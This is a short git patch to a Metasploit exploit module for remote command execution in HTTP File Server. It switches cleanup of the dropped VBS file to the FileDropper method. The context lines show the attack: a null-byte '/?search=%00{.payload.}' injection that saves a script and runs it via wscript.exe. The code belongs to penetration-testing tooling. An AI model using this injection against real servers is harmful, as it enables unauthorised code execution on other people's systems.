From 19ed594e9839b4fa9a150d9ef9a9373cea45c44a Mon Sep 17 00:00:00 2001
From: mfadzilr <mind1355@gmail.com>
Date: Sat, 20 Sep 2014 10:52:21 +0800
Subject: [PATCH] using FileDropper method for cleanup

---
 modules/exploits/windows/http/http_file_server_exec.rb | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/http_file_server_exec.rb
index f123d51d08..5e4a2f71a8 100644
--- a/modules/exploits/windows/http/http_file_server_exec.rb
+++ b/modules/exploits/windows/http/http_file_server_exec.rb
@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::EXE
   include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::FileDropper
 
   def initialize(info={})
     super(update_info(info,
@@ -86,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
       "save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}",
       "exec|wscript.exe //B //NOLOGO #{datastore['SAVE_PATH']}#{file_fullname}",
       # using wscript.exe instead of cmd.exe, thank mubix
-      "delete|#{datastore['SAVE_PATH']}#{file_fullname}"
+      #"delete|#{datastore['SAVE_PATH']}#{file_fullname}"
       # delete vbs file after execution
     ]
 
@@ -97,6 +98,8 @@ class Metasploit3 < Msf::Exploit::Remote
         'uri'    => "/?search=%00{.#{URI::encode(payload)}.}"
      })
     }
+    register_file_for_cleanup("#{datastore['SAVE_PATH']}#{file_fullname}")
+    # use FileDropper method for cleanup
   end
 
   def exploit